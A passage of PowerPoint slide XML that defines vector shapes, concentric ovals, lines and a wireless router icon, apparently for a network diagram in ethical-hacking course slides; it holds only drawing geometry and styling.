                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3169439E-961D-4EF2-B21A-1C4905DA1CA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54" y="-3681"/>
                <a:ext cx="630" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 267"/>
                  <a:gd name="T1" fmla="*/ 8 h 277"/>
                  <a:gd name="T2" fmla="*/ 14 w 267"/>
                  <a:gd name="T3" fmla="*/ 206 h 277"/>
                  <a:gd name="T4" fmla="*/ 247 w 267"/>
                  <a:gd name="T5" fmla="*/ 268 h 277"/>
                  <a:gd name="T6" fmla="*/ 247 w 267"/>
                  <a:gd name="T7" fmla="*/ 70 h 277"/>
                  <a:gd name="T8" fmla="*/ 14 w 267"/>
                  <a:gd name="T9" fmla="*/ 8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7" h="277">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="225"/>
                      <a:pt x="234" y="277"/>
                      <a:pt x="247" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="260"/>
                      <a:pt x="267" y="108"/>
                      <a:pt x="247" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="240" y="56"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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4" name="Freeform 1700">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC61EC0F-82A8-496A-8755-512E76B1804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17" y="-3620"/>
                <a:ext cx="489" cy="527"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 489"/>
                  <a:gd name="T1" fmla="*/ 0 h 527"/>
                  <a:gd name="T2" fmla="*/ 0 w 489"/>
                  <a:gd name="T3" fmla="*/ 397 h 527"/>
                  <a:gd name="T4" fmla="*/ 489 w 489"/>
                  <a:gd name="T5" fmla="*/ 527 h 527"/>
                  <a:gd name="T6" fmla="*/ 489 w 489"/>
                  <a:gd name="T7" fmla="*/ 130 h 527"/>
                  <a:gd name="T8" fmla="*/ 0 w 489"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="527">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="13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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="70588"/>
                      <a:invGamma/>
                    </a:srgbClr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5" name="Freeform 1701">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BDAF80-F7E4-41A0-84BC-3479959D2BA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87" y="-3681"/>
                <a:ext cx="640" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 271"/>
                  <a:gd name="T1" fmla="*/ 14 h 73"/>
                  <a:gd name="T2" fmla="*/ 41 w 271"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 271"/>
                  <a:gd name="T5" fmla="*/ 8 h 73"/>
                  <a:gd name="T6" fmla="*/ 233 w 271"/>
                  <a:gd name="T7" fmla="*/ 70 h 73"/>
                  <a:gd name="T8" fmla="*/ 265 w 271"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 100 w 271"/>
                  <a:gd name="T11" fmla="*/ 1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1" h="73">
                    <a:moveTo>
                      <a:pt x="100" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="48" y="4"/>
                      <a:pt x="41" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="4"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="222" y="60"/>
                      <a:pt x="233" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="73"/>
                      <a:pt x="271" y="69"/>
                      <a:pt x="265" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="59"/>
                      <a:pt x="161" y="29"/>
                      <a:pt x="100" y="1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6" name="Freeform 1702">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D70062-F7B4-4E1F-BBD0-1F2CE1DA31A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76" y="-3154"/>
                <a:ext cx="660" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 660"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 660"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 660 w 660"/>
                  <a:gd name="T5" fmla="*/ 120 h 175"/>
                  <a:gd name="T6" fmla="*/ 452 w 660"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 660"/>
                  <a:gd name="T9" fmla="*/ 52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0" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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7" name="Freeform 1703">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E231F8D-F7BC-44FE-9F3C-EAFD9668266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28" y="-3034"/>
                <a:ext cx="198" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 55 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 198"/>
                  <a:gd name="T3" fmla="*/ 88 h 88"/>
                  <a:gd name="T4" fmla="*/ 198 w 198"/>
                  <a:gd name="T5" fmla="*/ 36 h 88"/>
                  <a:gd name="T6" fmla="*/ 198 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 5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88">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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8" name="Freeform 1704">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6D8A2F-94E6-410E-A391-61A3C4C9067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76" y="-3102"/>
                <a:ext cx="452" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 35 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T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2" h="156">
                    <a:moveTo>
                      <a:pt x="452" y="156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452" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="15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9" name="Freeform 1705">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DA685E-5835-4358-A73A-937FBBF549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38" y="-3140"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 38 h 139"/>
                  <a:gd name="T2" fmla="*/ 383 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 104 h 139"/>
                  <a:gd name="T6" fmla="*/ 135 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 3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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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pic>
          <p:nvPicPr>
            <p:cNvPr id="1591" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70AF4CFF-F3D6-4EA6-9007-4215681B4E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0467" y="2817532"/>
              <a:ext cx="438568" cy="43856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592" name="Group 1591">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691D1224-2539-43FB-9358-2A898F86A2F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7222379" y="1518140"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790138"/>
              <a:chExt cx="2422854" cy="2419252"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2055" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A102CFA2-F377-44A0-8D31-9273106AFD50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5546" y="790138"/>
                <a:ext cx="2422854" cy="2419252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56" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2EBC58-79EE-4785-92AF-CAA0995946FA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74661" y="949016"/>
                <a:ext cx="2104624" cy="2101495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57" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5977EC5-1341-423A-BBC5-0E4E85343C44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342017" y="1116122"/>
                <a:ext cx="1769913" cy="1767282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58" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A887FDCD-E775-4A9F-80DF-685ED40BB2D6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509373" y="1283228"/>
                <a:ext cx="1435203" cy="1433067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59" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEA1144-B0B5-4C1F-A64C-A9A872F27BE3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676729" y="1450336"/>
                <a:ext cx="1100491" cy="1098854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0" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD5B8AE-F4B4-46E5-999F-9FF3564C4D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860669" y="1634001"/>
                <a:ext cx="732611" cy="731521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1" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017BE457-2B42-4185-AFE8-B07BBAF0686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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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593" name="Line 476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDF8F4E-296F-43EB-8E0D-D5EAF0B5C8C3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7679834" y="2765084"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill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94" name="Line 477">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C59E8F-76F9-47ED-8BC2-558D3D3B3522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7584584" y="2790484"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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95" name="Freeform 1305">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308CABE5-9F40-4F77-9A2E-87DBAFF21512}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4464530" y="2777804"/>
              <a:ext cx="2063750" cy="555625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algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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96" name="Freeform 1309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBC1A45-E073-40AA-9783-50897495DDBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6069492" y="2346004"/>
              <a:ext cx="2063750" cy="555625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CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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97" name="Freeform 1312">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3601C33-9393-43A4-BFA8-7D19A9940F86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7674455" y="1915792"/>
              <a:ext cx="2063750" cy="555625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CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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98" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A44FBC-930B-4ED4-8A6A-43C5A48FE5B3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8567" y="2399979"/>
              <a:ext cx="1631950" cy="439738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noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF66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ACAC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25400" dir="54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99" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390C8C9E-E998-4A14-94EA-AA14C31B8365}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4680430" y="2836542"/>
              <a:ext cx="1631950" cy="439738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noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="00B0F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ACAC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25400" dir="54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00" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44E63B8-847E-45B4-B453-2BF290EC19E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7879242" y="1972942"/>
              <a:ext cx="1631950" cy="439738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noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF66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ACAC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25400" dir="54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01" name="Line 1707">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EAD515-3867-469E-9017-3F9122567000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5159855" y="2669854"/>
              <a:ext cx="0" cy="2508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02" name="Group 1688">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADB8AA1-BC7B-4AE4-B447-D6E92FA5DBC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124931" y="2633342"/>
              <a:ext cx="236538" cy="201613"/>
              <a:chOff x="4876" y="-3681"/>
              <a:chExt cx="865" cy="735"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2047" name="Freeform 1689">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4045408F-2759-4D9B-897A-DDAF40E7FA9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6" y="-3537"/>
                <a:ext cx="205" cy="506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 9 h 214"/>
                  <a:gd name="T2" fmla="*/ 14 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 214"/>
                  <a:gd name="T4" fmla="*/ 69 w 87"/>
                  <a:gd name="T5" fmla="*/ 197 h 214"/>
                  <a:gd name="T6" fmla="*/ 75 w 87"/>
                  <a:gd name="T7" fmla="*/ 4 h 214"/>
                  <a:gd name="T8" fmla="*/ 43 w 87"/>
                  <a:gd name="T9" fmla="*/ 9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214">
                    <a:moveTo>
                      <a:pt x="43" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="17"/>
                      <a:pt x="0" y="171"/>
                      <a:pt x="14" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="209"/>
                      <a:pt x="49" y="214"/>
                      <a:pt x="69" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="16"/>
                      <a:pt x="75" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="4"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="43" y="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48" name="Freeform 1690">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63B3E12D-C40B-4268-B9D9-06CC532E4F1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54" y="-3681"/>
                <a:ext cx="630" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 267"/>
                  <a:gd name="T1" fmla="*/ 8 h 277"/>
                  <a:gd name="T2" fmla="*/ 14 w 267"/>
                  <a:gd name="T3" fmla="*/ 206 h 277"/>
                  <a:gd name="T4" fmla="*/ 247 w 267"/>
                  <a:gd name="T5" fmla="*/ 268 h 277"/>
                  <a:gd name="T6" fmla="*/ 247 w 267"/>
                  <a:gd name="T7" fmla="*/ 70 h 277"/>
                  <a:gd name="T8" fmla="*/ 14 w 267"/>
                  <a:gd name="T9" fmla="*/ 8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7" h="277">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="225"/>
                      <a:pt x="234" y="277"/>
                      <a:pt x="247" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="260"/>
                      <a:pt x="267" y="108"/>
                      <a:pt x="247" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="240" y="56"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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49" name="Freeform 1691">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C0FAF26-038C-4538-8593-BF9A40168BD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17" y="-3620"/>
                <a:ext cx="489" cy="527"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 489"/>
                  <a:gd name="T1" fmla="*/ 0 h 527"/>
                  <a:gd name="T2" fmla="*/ 0 w 489"/>
                  <a:gd name="T3" fmla="*/ 397 h 527"/>
                  <a:gd name="T4" fmla="*/ 489 w 489"/>
                  <a:gd name="T5" fmla="*/ 527 h 527"/>
                  <a:gd name="T6" fmla="*/ 489 w 489"/>
                  <a:gd name="T7" fmla="*/ 130 h 527"/>
                  <a:gd name="T8" fmla="*/ 0 w 489"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="527">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="13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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr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50" name="Freeform 1692">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295C055D-78F2-4125-B4AA-690B34EB60E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87" y="-3681"/>
                <a:ext cx="640" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 271"/>
                  <a:gd name="T1" fmla="*/ 14 h 73"/>
                  <a:gd name="T2" fmla="*/ 41 w 271"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 271"/>
                  <a:gd name="T5" fmla="*/ 8 h 73"/>
                  <a:gd name="T6" fmla="*/ 233 w 271"/>
                  <a:gd name="T7" fmla="*/ 70 h 73"/>
                  <a:gd name="T8" fmla="*/ 265 w 271"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 100 w 271"/>
                  <a:gd name="T11" fmla="*/ 1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1" h="73">
                    <a:moveTo>
                      <a:pt x="100" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="48" y="4"/>
                      <a:pt x="41" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="4"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="222" y="60"/>
                      <a:pt x="233" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="73"/>
                      <a:pt x="271" y="69"/>
                      <a:pt x="265" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="59"/>
                      <a:pt x="161" y="29"/>
                      <a:pt x="100" y="1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51" name="Freeform 1693">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B4D130-7BD5-47F7-9C01-0B5EE07403B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76" y="-3154"/>
                <a:ext cx="660" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 660"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 660"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 660 w 660"/>
                  <a:gd name="T5" fmla="*/ 120 h 175"/>
                  <a:gd name="T6" fmla="*/ 452 w 660"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 660"/>
                  <a:gd name="T9" fmla="*/ 52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0" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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52" name="Freeform 1694">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6883C974-D43F-40F4-9998-ECF19135679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28" y="-3034"/>
                <a:ext cx="198" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 55 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 198"/>
                  <a:gd name="T3" fmla="*/ 88 h 88"/>
                  <a:gd name="T4" fmla="*/ 198 w 198"/>
                  <a:gd name="T5" fmla="*/ 36 h 88"/>
                  <a:gd name="T6" fmla="*/ 198 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 5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88">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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53" name="Freeform 1695">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
